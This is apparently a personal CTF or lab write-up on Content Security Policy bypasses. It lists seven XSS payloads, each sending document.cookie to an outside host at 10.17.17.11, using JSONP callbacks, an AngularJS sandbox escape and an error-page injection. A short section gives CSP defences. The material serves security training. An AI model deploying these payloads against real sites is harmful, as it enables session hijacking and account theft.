<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../../style.css">
    <base target="_parent">
    <title data-trilium-title>payloads</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>payloads</h1>

      <div class="ck-content">
        <p>chal1 is pretty straightforward, chal2 allows loading of resources from
          unsafe sources, chal3 allows loading images form unsafe sources, chal4
          requires a matching nonce attribute.</p><pre><code class="language-text-plain">chal1: &lt;script&gt;document.location='http://10.17.17.11/?cookie='+document.cookie&lt;/script&gt;


chal2: &lt;script src="api/images/8QSTj0ThetVy/${document.cookie}`)"&gt;&lt;/script&gt;

chal3: &lt;script&gt;(new Image()).src = `http://10.17.17.11/${encodeURIComponent(document.cookie)}`&lt;/script&gt;

chal4: &lt;script nonce="abcdef"&gt;window.location='http://10.17.17.11/'+document.cookie&lt;/script&gt;</code></pre>

        <p>chal5 trusts google subdomains and unsafe eval function allows cookie
          stealing.</p><pre><code class="language-text-plain">chal5: &lt;script src="https://accounts.google.com/o/oauth2/revoke?callback=eval((new Image()).src = `http://10.17.17.11/${encodeURIComponent(document.cookie)}`)"&gt;&lt;/script&gt;

		&lt;script src="//accounts.google.com/o/oauth2/revoke?callback=eval(document.location='http://10.17.17.11/'.concat(document.cookie))"&gt;&lt;/script&gt;</code></pre>

        <p>chal6 trusts cloudflare, just finding the correct syntax( <a href="https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass">https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass</a> )</p><pre><code class="language-text-plain">chal6: &lt;script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.3/prototype.min.js" integrity="sha512-C4LuwXQtQOF1iTRy3zwClYLsLgFLlG8nCV5dCxDjPcWsyFelQXzi3efHRjptsOzbHwwnXC3ZU+sWUh1gmxaTBA==" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.2/angular.min.js"&gt;&lt;/script&gt;
&lt;div ng-app ng-csp&gt;

{{$on.curry.call().document.location='http://10.17.17.11/' + $on.curry.call().document.cookie}}

&lt;/div&gt;</code></pre>

        <p>chal7 allows xss from its error pages <code>/</code> and using audio function
          we can exfill the cookie</p><pre><code class="language-text-plain">chal7: &lt;script src="/'; new Audio('http://10.17.17.11/' + document.cookie); '"&gt;&lt;/script&gt;</code></pre>

         <h2>Defend:</h2>

        <p>first, defend chal is pretty simple, just limiting scripts to our website <code>script-src ‘self’;</code>

        </p>
        <p>In second, we have to use a nonce value(aparantly others don't work and
          you have to use helmet, not figuring out how to now tho) <code>script-src ‘nonce-ae3b00’;</code>

        </p>
        <p>for third, we need a sha256 hash of the inline js(view source and between
          script tags <span style="color:rgb(0,0,0)"><code>console.log("__defend-3_REAL=true"))</code></span>

        </p>
        <p><span style="color:rgb(0,0,0)">use </span><a href="https://report-uri.com/home/hash"><span style="color:rgb(0,0,0)">https://report-uri.com/home/hash</span></a>

          <span
          style="color:rgb(0,0,0)"> to generate hash and use it like so:</span>
        </p>
        <p><span style="color:rgb(0,0,0)"><code>script-src 'sha256-8gQ3l0jVGr5ZXaOeym+1jciekP8wsfNgpZImdHthDRo=';</code></span>

        </p>
        <p> </p>
        <p> </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>